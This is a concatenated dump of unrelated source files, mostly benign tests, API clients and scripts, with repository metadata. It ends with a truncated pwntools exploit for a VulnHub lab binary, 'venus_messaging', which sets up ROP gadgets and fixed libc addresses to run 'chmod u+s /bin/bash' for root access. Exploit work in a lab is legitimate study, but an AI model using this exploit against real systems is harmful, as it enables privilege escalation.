] | 23 | 2019-01-25T14:58:20.000Z | 2022-03-27T02:20:01.000Z | flake8_pie/tests/test_pie803_prefer_logging_interpolation.py | sbdchd/flake8-assign-and-return | 96ae441d92abe64b23e1c37b0eb15778434000cc | [
"BSD-2-Clause"
] | 50 | 2019-04-17T02:37:01.000Z | 2022-03-27T02:19:53.000Z | flake8_pie/tests/test_pie803_prefer_logging_interpolation.py | sbdchd/flake8-assign-and-return | 96ae441d92abe64b23e1c37b0eb15778434000cc | [
"BSD-2-Clause"
] | 5 | 2019-02-21T07:29:12.000Z | 2021-11-06T21:01:26.000Z | from __future__ import annotations
import ast
import pytest
from flake8_pie import Flake8PieCheck
from flake8_pie.pie803_prefer_logging_interpolation import PIE803
from flake8_pie.tests.utils import Error, ex, to_errors
EXAMPLES = [
ex(
code=r"""
logger.info("Login error for %s" % user)
""",
errors=[PIE803(lineno=2, col_offset=12)],
),
ex(
code=r"""
log.warn("Login error for %s, %s" % (user_id, name))
""",
errors=[PIE803(lineno=2, col_offset=9)],
),
ex(
code=r"""
logging.log("Login error for {}".format(user))
""",
errors=[PIE803(lineno=2, col_offset=12)],
),
ex(
code=r"""
logging.log(logging.DEBUG, "Login error for {}".format(user))
""",
errors=[PIE803(lineno=2, col_offset=27)],
),
ex(
code=r"""
logger.debug("Login error for {}, {}".format(user_id, name))
""",
errors=[PIE803(lineno=2, col_offset=13)],
),
ex(
code=r"""
logger.critical(f"Login error for {user}")
""",
errors=[PIE803(lineno=2, col_offset=16)],
),
ex(
code=r"""
log.info(f"Login error for {user:0.2f}")
""",
errors=[PIE803(lineno=2, col_offset=9)],
),
ex(
code=r"""
self.logger.critical(f"Login error for {user}, {userid}")
""",
errors=[PIE803(lineno=2, col_offset=21)],
),
ex(
code=r"""
self.log.exception(f"Login error for")
logger.info("Login error for %s", user)
log.info("Login error for %s, %s", user_id, name)
""",
errors=[],
),
]
@pytest.mark.parametrize("code,errors", EXAMPLES)
def test_prefer_logging_interpolation(code: str, errors: list[Error]) -> None:
expr = ast.parse(code)
assert to_errors(Flake8PieCheck(expr, filename="foo.py").run()) == errors
| 24.066667 | 78 | 0.587812 | 239 | 1,805 | 4.330544 | 0.271967 | 0.10628 | 0.138164 | 0.14686 | 0.542029 | 0.501449 | 0.446377 | 0.307246 | 0.307246 | 0.216425 | 0 | 0.042569 | 0.232133 | 1,805 | 74 | 79 | 24.391892 | 0.704185 | 0 | 0 | 0.588235 | 0 | 0 | 0.330748 | 0.057064 | 0 | 0 | 0 | 0 | 0.014706 | 1 | 0.014706 | false | 0 | 0.088235 | 0 | 0.102941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
373b0831f54ef02bac3d59c0fc65db6ad11950d7 | 1,517 | py | Python | test/test_graph/test_slice.py | jjon/rdflib | 4c2ab7b392b353bf3c6088017ec9351ce8ac3db6 | [
"BSD-3-Clause"
] | null | null | null | test/test_graph/test_slice.py | jjon/rdflib | 4c2ab7b392b353bf3c6088017ec9351ce8ac3db6 | [
"BSD-3-Clause"
] | 6 | 2021-11-22T19:10:32.000Z | 2022-01-31T19:16:37.000Z | test/test_graph/test_slice.py | jjon/rdflib | 4c2ab7b392b353bf3c6088017ec9351ce8ac3db6 | [
"BSD-3-Clause"
] | null | null | null | from test.data import bob, cheese, hates, likes, michel, pizza, tarek
from rdflib import Graph
class TestGraphSlice:
def test_slice(self):
"""
We pervert the slice object,
and use start, stop, step as subject, predicate, object
all operations return generators over full triples
"""
def sl(x, y):
return len(list(x)) == y
def soe(x, y):
return set([a[2] for a in x]) == set(y) # equals objects
g = Graph()
g.add((tarek, likes, pizza))
g.add((tarek, likes, cheese))
g.add((michel, likes, pizza))
g.add((michel, likes, cheese))
g.add((bob, likes, cheese))
g.add((bob, hates, pizza))
g.add((bob, hates, michel)) # gasp!
# Single terms are all trivial:
# single index slices by subject, i.e. return triples((x,None,None))
# tell me everything about "tarek"
        assert sl(g[tarek], 2)
        # single slice slices by s,p,o, with : used to split
        # tell me everything about "tarek" (same as above)
        assert sl(g[tarek::], 2)
        # give me every "likes" relationship
        assert sl(g[:likes:], 5)
        # give me every relationship to pizza
        assert sl(g[::pizza], 3)
        # give me everyone who likes pizza
        assert sl(g[:likes:pizza], 2)
        # does tarek like pizza?
        assert g[tarek:likes:pizza] is True
        # More interesting is using paths
        # everything hated or liked
        assert sl(g[: hates | likes], 7)
| 27.089286 | 76 | 0.556361 | 209 | 1,517 | 4.033493 | 0.45933 | 0.033215 | 0.032028 | 0.053381 | 0.104389 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006843 | 0.325643 | 1,517 | 55 | 77 | 27.581818 | 0.817204 | 0.376401 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 1 | 0.130435 | false | 0 | 0.086957 | 0.086957 | 0.347826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
373cd2d11dd4c527255309c855c5dbf16d3610fd | 2,163 | py | Python | pyContabo/Tags.py | xLeon-python/pyContabo | 9863bd1ab0f95b50186902c90c40ce53d3026afd | [
"MIT"
] | 5 | 2022-01-03T10:34:35.000Z | 2022-01-27T10:34:41.000Z | pyContabo/Tags.py | xLeon-python/pyContabo | 9863bd1ab0f95b50186902c90c40ce53d3026afd | [
"MIT"
] | 4 | 2022-01-14T10:37:57.000Z | 2022-01-20T20:44:54.000Z | pyContabo/Tags.py | xLeon-python/pyContabo | 9863bd1ab0f95b50186902c90c40ce53d3026afd | [
"MIT"
] | 1 | 2022-01-20T14:59:32.000Z | 2022-01-20T14:59:32.000Z | import json
from typing import List, Union
from .Tag import Tag
from .audits.TagsAudits import TagsAudits
class Tags:
def __init__(self, _http):
self._http = _http
self.Audits = TagsAudits(_http)
def get(
self,
id: str = None,
page: int = None,
pageSize: int = None,
orderBy: str = None,
name: str = None,
x_request_id: str = None,
x_trace_id: str = None,
) -> Union[Tag, List[Tag]]:
"""gets any tag by id or other parameters through the paging system"""
if id:
resp = self._http.request(
type="get",
url=f"https://api.contabo.com/v1/tags/{id}",
x_request_id=x_request_id,
x_trace_id=x_trace_id,
)
if resp.status_code == 404:
return []
return Tag(resp.json()["data"][0], self._http)
else:
url = f"https://api.contabo.com/v1/tags?{f'page={page}&' if page is not None else ''}{f'size={pageSize}&' if pageSize is not None else ''}{f'orderBy={orderBy}&' if orderBy is not None else ''}{f'name={name}&' if name is not None else ''}"
            url = url[:-1]  # strip the trailing "&" (or the "?" when no filters were given)
resp = self._http.request(
type="get", url=url, x_request_id=x_request_id, x_trace_id=x_trace_id
)
data = resp.json()["data"]
if len(data) == 0:
return []
tags = []
for i in resp.json()["data"]:
tags.append(Tag(i, self._http))
return tags
def create(
self, name: str, color: str, x_request_id: str = None, x_trace_id: str = None
) -> bool:
"""creates new tag using name and color"""
data = json.dumps({"name": name, "color": color})
resp = self._http.request(
type="post",
url=f"https://api.contabo.com/v1/tags",
data=data,
x_request_id=x_request_id,
x_trace_id=x_trace_id,
)
if resp.status_code == 201:
return True
return False
| 29.630137 | 250 | 0.520573 | 285 | 2,163 | 3.785965 | 0.277193 | 0.027804 | 0.074143 | 0.061168 | 0.379981 | 0.317887 | 0.317887 | 0.266914 | 0.189064 | 0.189064 | 0 | 0.008584 | 0.353675 | 2,163 | 72 | 251 | 30.041667 | 0.763233 | 0.064263 | 0 | 0.163636 | 0 | 0.018182 | 0.162444 | 0.023845 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054545 | false | 0 | 0.072727 | 0 | 0.254545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
373ce6abe69658df775573e30396ce08743e65d4 | 1,458 | py | Python | 2021/07/b.py | cj-wong/advent | f6a489773f488f5daf49caa9d652b1886608b928 | [
"MIT"
] | null | null | null | 2021/07/b.py | cj-wong/advent | f6a489773f488f5daf49caa9d652b1886608b928 | [
"MIT"
] | null | null | null | 2021/07/b.py | cj-wong/advent | f6a489773f488f5daf49caa9d652b1886608b928 | [
"MIT"
] | null | null | null | from collections import Counter, defaultdict
from typing import Dict, List
import config
def calculate_crab_pos_change_fuel(start: int, end: int) -> int:
"""Calculate the amount of fuel changed per position.
Args:
start (int): starting position
end (int): ending position
Returns:
int: the number of fuel consumed
"""
diff = abs(start - end)
return (diff * (diff + 1)) // 2
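# Illustration: moving from position 16 to 5 is 11 steps, which costs
# 1 + 2 + ... + 11 = 11 * 12 // 2 = 66 fuel -- the triangular number of the
# distance (this matches the puzzle's worked example).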
def calculate_min_crab_sub_fuel(contents: List[str]) -> int:
"""Calculate the minimum amount of fuel for the crab-subs.
Args:
contents (List[str]): the file contents
Returns:
int
"""
crab_pos = [int(pos) for pos in contents[0].split(',')]
fuel: Dict[int, int] = defaultdict(int)
count = Counter(crab_pos)
uniq_pos = set(crab_pos)
start = min(uniq_pos)
end = max(uniq_pos)
for u_pos in range(start, end + 1):
pos_fuel = [
calculate_crab_pos_change_fuel(pos, u_pos) * count[pos]
for pos in uniq_pos
]
fuel[u_pos] = sum(pos_fuel)
return min(fuel.values())
def main() -> None:
"""Run the main code."""
test_answer = 168
test_file = config.TestFile(test_answer)
test = calculate_min_crab_sub_fuel(test_file.contents)
test_file.test(test)
file = config.File()
result = calculate_min_crab_sub_fuel(file.contents)
config.LOGGER.info(result)
if __name__ == '__main__':
main()
| 23.516129 | 67 | 0.633059 | 201 | 1,458 | 4.368159 | 0.333333 | 0.039863 | 0.05467 | 0.06492 | 0.137813 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006464 | 0.257202 | 1,458 | 61 | 68 | 23.901639 | 0.804247 | 0.215364 | 0 | 0 | 0 | 0 | 0.008333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
373f20855c48097a781ae0349231baa0bc6b5ae5 | 5,730 | py | Python | aplus_client/django/models.py | apluslms/a-plus-client | 21cf1575ef70baf6ece70d6ae99f7bcee554e9b1 | [
"MIT"
] | 1 | 2019-10-13T10:21:51.000Z | 2019-10-13T10:21:51.000Z | aplus_client/django/models.py | apluslms/a-plus-client | 21cf1575ef70baf6ece70d6ae99f7bcee554e9b1 | [
"MIT"
] | null | null | null | aplus_client/django/models.py | apluslms/a-plus-client | 21cf1575ef70baf6ece70d6ae99f7bcee554e9b1 | [
"MIT"
] | 1 | 2018-08-28T18:32:20.000Z | 2018-08-28T18:32:20.000Z | import datetime
from functools import reduce
from urllib.parse import urlsplit
from django.apps import apps
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.utils import timezone
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
class ApiNamespace(models.Model):
domain = models.CharField(max_length=255, db_index=True)
class Meta:
abstract = apps.get_containing_app_config(__name__) is None
verbose_name = _("Namespace")
verbose_name_plural = _("Namespaces")
@classmethod
def get_by_url(cls, url):
hostname = urlsplit(url).hostname
if not hostname:
raise ValueError("Url doesn't have hostname")
obj, created = cls.objects.get_or_create(domain=hostname)
return obj
def __str__(self):
return self.domain
class CachedApiQuerySet(models.QuerySet):
def get_new_or_updated(self, api_obj, **kwargs):
obj, created = self.get_or_create(api_obj, **kwargs)
if not created and obj.should_be_updated:
self.update_object(obj, api_obj, **kwargs)
obj.save()
return obj
def get_or_create(self, api_obj, **kwargs):
select_related = kwargs.pop('select_related', None)
try:
qs = self
if select_related:
qs = qs.select_related(*select_related)
return qs.get(api_id=api_obj.id, **kwargs), False
except ObjectDoesNotExist:
return self.create(api_obj, **kwargs), True
def create(self, api_obj, **kwargs):
obj = self.model(api_id=api_obj.id)
self.update_object(obj, api_obj, **kwargs)
obj.save()
return obj
def update_object(self, obj, api_obj, **kwargs):
if not obj.url and api_obj.url:
obj.url = api_obj.url
obj.update_with(api_obj, **kwargs)
update_object.queryset_only = True
CachedApiManager = models.Manager.from_queryset(CachedApiQuerySet)
class CachedApiObject(models.Model):
TTL = datetime.timedelta(hours=1)
class Meta:
abstract = True
get_latest_by = 'updated'
api_id = models.IntegerField()
url = models.URLField()
updated = models.DateTimeField(auto_now=True)
@property
def should_be_updated(self):
age = timezone.now() - self.updated
return age > self.TTL
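    # e.g. with the default TTL of one hour, an instance saved 90 minutes ago
    # reports should_be_updated == True, so get_new_or_updated() refreshes the
    # cached row from the api_obj it was handed.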
def update_using(self, client):
data = client.load_data(self.url)
self.update_with(data)
def update_with(self, api_obj, **kwargs):
fields = (
(f, f.name, f.related_model)
for f in self._meta.get_fields()
if (
f.concrete and (
not f.is_relation
or f.one_to_one
or (f.many_to_one and f.related_model)
) and
f.name not in ('id', 'url', 'updated')
)
)
for f, name, model in fields:
if name in kwargs:
setattr(self, name, kwargs[name])
continue
try:
value = api_obj[name]
except KeyError:
continue
if model:
value = model.objects.get_new_or_updated(value, **kwargs)
setattr(self, name, value)
class NamespacedApiQuerySet(CachedApiQuerySet):
def using_namespace(self, namespace):
if not isinstance(namespace, ApiNamespace):
namespace = ApiNamespace.get_by_url(namespace)
return self.filter(namespace=namespace)
def using_namespace_id(self, namespace_id):
return self.filter(namespace_id=namespace_id)
def get_new_or_updated(self, api_obj, **kwargs):
if 'namespace' not in kwargs:
kwargs['namespace'] = ApiNamespace.get_by_url(api_obj.url)
return super().get_new_or_updated(api_obj, **kwargs)
def update_object(self, obj, api_obj, namespace=None, **kwargs):
if namespace is None:
try:
namespace = obj.namespace
except ObjectDoesNotExist:
namespace = ApiNamespace.get_by_url(api_obj.url)
try:
obj.namespace
except ObjectDoesNotExist:
obj.namespace = namespace
super().update_object(obj, api_obj, namespace=namespace, **kwargs)
class NamespacedApiObject(CachedApiObject):
Manager = CachedApiManager.from_queryset(NamespacedApiQuerySet)
objects = Manager()
namespace = models.ForeignKey(ApiNamespace, on_delete=models.PROTECT)
class Meta:
abstract = True
unique_together = ('namespace', 'api_id')
def update_with(self, api_obj, **kwargs):
kwargs.setdefault('namespace', self.namespace)
super().update_with(api_obj, **kwargs)
class NestedApiQuerySet(CachedApiQuerySet):
@cached_property
def namespace_filter(self):
return self.model.NAMESPACE_FILTER
def filter(self, *args, **kwargs):
if 'namespace' in kwargs:
kwargs[self.namespace_filter] = kwargs.pop('namespace')
return super().filter(*args, **kwargs)
def get_new_or_updated(self, api_obj, **kwargs):
if 'namespace' not in kwargs:
kwargs['namespace'] = ApiNamespace.get_by_url(api_obj.url)
return super().get_new_or_updated(api_obj, **kwargs)
class NestedApiObject(CachedApiObject):
NAMESPACE_FILTER = None
Manager = CachedApiManager.from_queryset(NestedApiQuerySet)
objects = Manager()
class Meta:
abstract = True
@property
def namespace(self):
raise NotImplementedError("Subclass should define .namespace property")
| 31.311475 | 79 | 0.63822 | 671 | 5,730 | 5.247392 | 0.207154 | 0.044306 | 0.05453 | 0.031809 | 0.214996 | 0.158762 | 0.158762 | 0.127237 | 0.116444 | 0.106788 | 0 | 0.000956 | 0.269459 | 5,730 | 182 | 80 | 31.483516 | 0.840182 | 0 | 0 | 0.265734 | 0 | 0 | 0.03438 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125874 | false | 0 | 0.062937 | 0.020979 | 0.433566 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
373f799d97bc4aea9455aac2ae9a2ed13f94701c | 1,010 | py | Python | tests/changes/api/test_kick_sync_repo.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 443 | 2015-01-03T16:28:39.000Z | 2021-04-26T16:39:46.000Z | tests/changes/api/test_kick_sync_repo.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 12 | 2015-07-30T19:07:16.000Z | 2016-11-07T23:11:21.000Z | tests/changes/api/test_kick_sync_repo.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 47 | 2015-01-09T10:04:00.000Z | 2020-11-18T17:58:19.000Z | import json
import mock
from changes.config import db
from changes.testutils import APITestCase
class KickSyncRepoTest(APITestCase):
path = '/api/0/kick_sync_repo/'
def setUp(self):
self.repo = self.create_repo()
db.session.commit()
super(KickSyncRepoTest, self).setUp()
def test_simple(self):
with mock.patch('changes.api.kick_sync_repo.sync_repo.delay') as mocked:
resp = self.client.post(self.path, data={
'repository': self.repo.url,
})
assert resp.status_code == 200
assert mocked.call_count == 1
_, kwargs = mocked.call_args
assert kwargs['repo_id'] == self.repo.id.hex
assert kwargs['continuous'] is False
def test_not_found(self):
resp = self.client.post(self.path, data={
'repository': 'git@doesnotexist.com',
})
assert resp.status_code == 400
error = json.loads(resp.data)
assert 'repository' in error['problems']
| 29.705882 | 80 | 0.623762 | 124 | 1,010 | 4.959677 | 0.491935 | 0.039024 | 0.039024 | 0.058537 | 0.130081 | 0.130081 | 0.130081 | 0.130081 | 0 | 0 | 0 | 0.010724 | 0.261386 | 1,010 | 33 | 81 | 30.606061 | 0.813673 | 0 | 0 | 0.148148 | 0 | 0 | 0.137624 | 0.063366 | 0 | 0 | 0 | 0 | 0.222222 | 1 | 0.111111 | false | 0 | 0.148148 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37401799ef8790b8796a6d77073cb66a40a6c746 | 1,350 | py | Python | send.py | b1tst0rm/pygsuite | 8884d85b3bf038c4e41b6447f0c20af6b1925044 | [
"MIT"
] | 1 | 2021-06-10T16:59:57.000Z | 2021-06-10T16:59:57.000Z | send.py | b1tst0rm/pygsuite | 8884d85b3bf038c4e41b6447f0c20af6b1925044 | [
"MIT"
] | null | null | null | send.py | b1tst0rm/pygsuite | 8884d85b3bf038c4e41b6447f0c20af6b1925044 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import smtplib
import ssl
import traceback
from email.message import EmailMessage
import csv
csv_name = input("Enter path to CSV: ")
with open(csv_name) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=",")
for row in csv_reader:
title = row[0]
last_name = row[1]
org = row[2]
email = row[3]
body = (
"""
%s %s,
Thanks for signing up for our mailing list.
We're happy your organization, %s, has joined us.
Cheers,
Daniel Limanowski
"""
% (title, last_name, org)
)
msg = EmailMessage()
msg['Subject'] = ("%s %s - mailing list" % (title, last_name))
msg['From'] = "daniel@b1tst0rm.net"
msg['To'] = email
msg.set_content(body)
context = ssl.create_default_context()
try:
            # Do NOT use SMTP_SSL; it fails negotiating SSL versions.
            # Instead use the starttls command to force encryption.
server = smtplib.SMTP('smtp-relay.gmail.com', 587)
server.set_debuglevel(1)
server.starttls(context=context)
server.send_message(msg)
server.quit()
print('Email sent!')
except Exception:
traceback.print_exc()
| 27 | 70 | 0.554074 | 159 | 1,350 | 4.603774 | 0.566038 | 0.036885 | 0.032787 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012401 | 0.342963 | 1,350 | 49 | 71 | 27.55102 | 0.812852 | 0.094074 | 0 | 0 | 0 | 0 | 0.101678 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.16129 | 0 | 0.16129 | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37403c0b4b4f8c0a873678dc2513d03b98245665 | 609 | py | Python | falco/client_credentials.py | jasondellaluce/client-py | 694780796289fdd20f1588d06e66c5a1b52ecb26 | [
"Apache-2.0"
] | 20 | 2019-10-14T15:01:14.000Z | 2021-08-09T19:13:08.000Z | falco/client_credentials.py | jasondellaluce/client-py | 694780796289fdd20f1588d06e66c5a1b52ecb26 | [
"Apache-2.0"
] | 45 | 2019-10-14T14:55:30.000Z | 2022-02-11T03:27:37.000Z | falco/client_credentials.py | jasondellaluce/client-py | 694780796289fdd20f1588d06e66c5a1b52ecb26 | [
"Apache-2.0"
] | 11 | 2019-10-14T17:41:06.000Z | 2022-02-21T05:40:44.000Z | import grpc
def load_file(filepath):
with open(filepath, "rb") as f:
return f.read()
def get_grpc_channel_credentials(client_crt, client_key, ca_root):
"""Returns a ChannelCredentials object to use with the grpc channel
https://grpc.github.io/grpc/python/grpc.html#create-client-credentials
"""
root_certificates = load_file(ca_root)
private_key = load_file(client_key)
certificate_chain = load_file(client_crt)
return grpc.ssl_channel_credentials(
root_certificates=root_certificates, private_key=private_key, certificate_chain=certificate_chain,
)
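# Usage sketch (the file paths and address here are illustrative):
#   creds = get_grpc_channel_credentials("client.crt", "client.key", "ca.crt")
#   channel = grpc.secure_channel("localhost:5060", creds)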
| 27.681818 | 106 | 0.747126 | 82 | 609 | 5.256098 | 0.47561 | 0.074246 | 0.12529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.165846 | 609 | 21 | 107 | 29 | 0.848425 | 0.223317 | 0 | 0 | 0 | 0 | 0.004367 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3741437c9d6eeb011b2b876a314bb32cbeb6caaf | 2,020 | py | Python | scripts/release.py | ydcjeff/api-extractor | 0c8b22d75f21d08c3e7601e1bf15a37963742516 | [
"MIT"
] | 1 | 2021-07-03T18:42:38.000Z | 2021-07-03T18:42:38.000Z | scripts/release.py | ydcjeff/api-extractor | 0c8b22d75f21d08c3e7601e1bf15a37963742516 | [
"MIT"
] | 1 | 2022-02-04T14:42:25.000Z | 2022-02-06T02:21:44.000Z | scripts/release.py | ydcjeff/api-extractor | 0c8b22d75f21d08c3e7601e1bf15a37963742516 | [
"MIT"
] | null | null | null | # pylint: skip-file
import json
import subprocess
import sys
import api_extractor
try:
from semver import VersionInfo
except ImportError:
raise ImportError(
'semver must be installed for release. `pip install semver`'
)
try:
import koloro
except ImportError:
raise ImportError(
'koloro must be installed for release. `pip install koloro`'
)
RELEASE_TYPES = ('major', 'minor', 'patch', 'prerelease')
run = subprocess.call
def main():
pre_id = sys.argv[1] if len(sys.argv) > 1 else 'rc'
print('Release types are: ', RELEASE_TYPES)
idx = int(input('Select release type (index): '))
target_version = str(
VersionInfo.parse(api_extractor.__version__).next_version(
RELEASE_TYPES[idx], pre_id
)
)
if not VersionInfo.isvalid(target_version):
raise ValueError(f'Invalid target version: {target_version}')
tag = f'v{target_version}'
    yes = input(f'Releasing {tag}. Confirm? [y/N] ').lower() in ('yes', 'y')
if not yes:
return
print(koloro.cyan('Updating package version...'))
with open('package.json', 'r') as f:
pkg = json.load(f)
pkg['version'] = target_version
with open('package.json', 'w') as f:
json.dump(pkg, f)
print(koloro.cyan('Generating changelog...'))
run(['pnpm', 'changelog'])
print(koloro.cyan('Formatting...'))
run(['pnpm', 'fmt'])
    changelogOk = input(
        'Changelog generated. Does it look good? [y/N] '
    ).lower() in ('yes', 'y')
if not changelogOk:
return
print(koloro.cyan('Committing changes...'))
run(['git', 'add', '.'])
run(['git', 'commit', '-m', f'release: {tag}'])
print(koloro.cyan('Pushing to GitHub...'))
run(['git', 'tag', tag])
run(['git', 'push', 'origin', tag])
run(['git', 'push', '-u', 'origin', 'main'])
if __name__ == '__main__':
main()
| 21.263158 | 79 | 0.634653 | 265 | 2,020 | 4.743396 | 0.407547 | 0.062053 | 0.059666 | 0.052506 | 0.097056 | 0.055688 | 0.055688 | 0 | 0 | 0 | 0 | 0.001229 | 0.194554 | 2,020 | 94 | 80 | 21.489362 | 0.771358 | 0.008416 | 0 | 0.208955 | 0 | 0 | 0.287356 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014925 | false | 0 | 0.149254 | 0 | 0.19403 | 0.089552 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3743220aa5b97be4c5b07c94e92e07656a597733 | 674 | py | Python | Exercicios Curso Em Video Mundo 3/Exe_081.py | JorgeTranin/Python_Curso_Em_Video | be74c9301aafc055bdf883be649cb8b7716617e3 | [
"MIT"
] | null | null | null | Exercicios Curso Em Video Mundo 3/Exe_081.py | JorgeTranin/Python_Curso_Em_Video | be74c9301aafc055bdf883be649cb8b7716617e3 | [
"MIT"
] | null | null | null | Exercicios Curso Em Video Mundo 3/Exe_081.py | JorgeTranin/Python_Curso_Em_Video | be74c9301aafc055bdf883be649cb8b7716617e3 | [
"MIT"
] | null | null | null | '''
Python Exercise 081: Write a program that reads several
numbers and puts them in a list. Then show:
A) How many numbers were entered.
B) The list of values, sorted in descending order.
C) Whether the value 5 was entered and is in the list.
'''
lista = list()
while True:
    lista.append(int(input('Enter a value: ')))
    n = str(input('Do you want to continue? Y/N: '))
    if n in 'Nn':
        break
lista.sort(reverse=True)
print(f'You entered {len(lista)} values.')
print(f'The values in descending order are: {lista}')
if lista.count(5) == 0:
    print('The value 5 is not in the list')
else:
    print('The value 5 was entered and is in the list')
| 21.741935 | 57 | 0.675074 | 113 | 674 | 4.026549 | 0.628319 | 0.03956 | 0.046154 | 0.043956 | 0.083516 | 0.083516 | 0 | 0 | 0 | 0 | 0 | 0.014981 | 0.207715 | 674 | 30 | 58 | 22.466667 | 0.837079 | 0.376855 | 0 | 0 | 0 | 0 | 0.441463 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.307692 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
374483f15bf635d6c70ab7f2db45d14d34cefa97 | 1,327 | py | Python | vulnhub/venus/exploit_not_1337_version.py | nhtri2003gmail/ctf-write-ups | 7e969c47027c39b614e10739ae3a953eed17dfa3 | [
"MIT"
] | 101 | 2020-03-09T17:40:47.000Z | 2022-03-31T23:26:55.000Z | vulnhub/venus/exploit_not_1337_version.py | nhtri2003gmail/ctf-write-ups | 7e969c47027c39b614e10739ae3a953eed17dfa3 | [
"MIT"
] | 1 | 2021-11-09T13:39:40.000Z | 2021-11-10T19:15:04.000Z | vulnhub/venus/exploit_not_1337_version.py | datajerk/ctf-write-ups | 1bc4ecc63a59de7d924c7214b1ce467801792da0 | [
"MIT"
] | 31 | 2020-05-27T12:29:50.000Z | 2022-03-31T23:23:32.000Z | #!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./venus_messaging')
if args.REMOTE:
#p = remote('172.19.2.239',9080)
#port blocked? workaround: ssh -L 9080:localhost:9080 magellan@172.19.2.239
p = remote('localhost',9080)
libc = ELF('./libc.so.6')
# lame no ASLR
'''
# ldd /usr/bin/venus_messaging
linux-vdso.so.1 (0x00007ffff7fc9000)
libc.so.6 => /lib64/libc.so.6 (0x00007ffff7dee000)
/lib64/ld-linux-x86-64.so.2 (0x00007ffff7fcb000)
'''
libc.address = 0x00007ffff7dee000
else:
p = remote('localhost',9080)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc.address = 0x00007ffff7dc0000
fd = 0x4
command = b'chmod u+s /bin/bash'
pop_rdi = next(binary.search(asm('pop rdi; ret')))
pop_rsi = next(libc.search(asm('pop rsi; ret')))
pop_rdx_rcx_rbx = next(libc.search(asm('pop rdx; pop rcx; pop rbx; ret')))
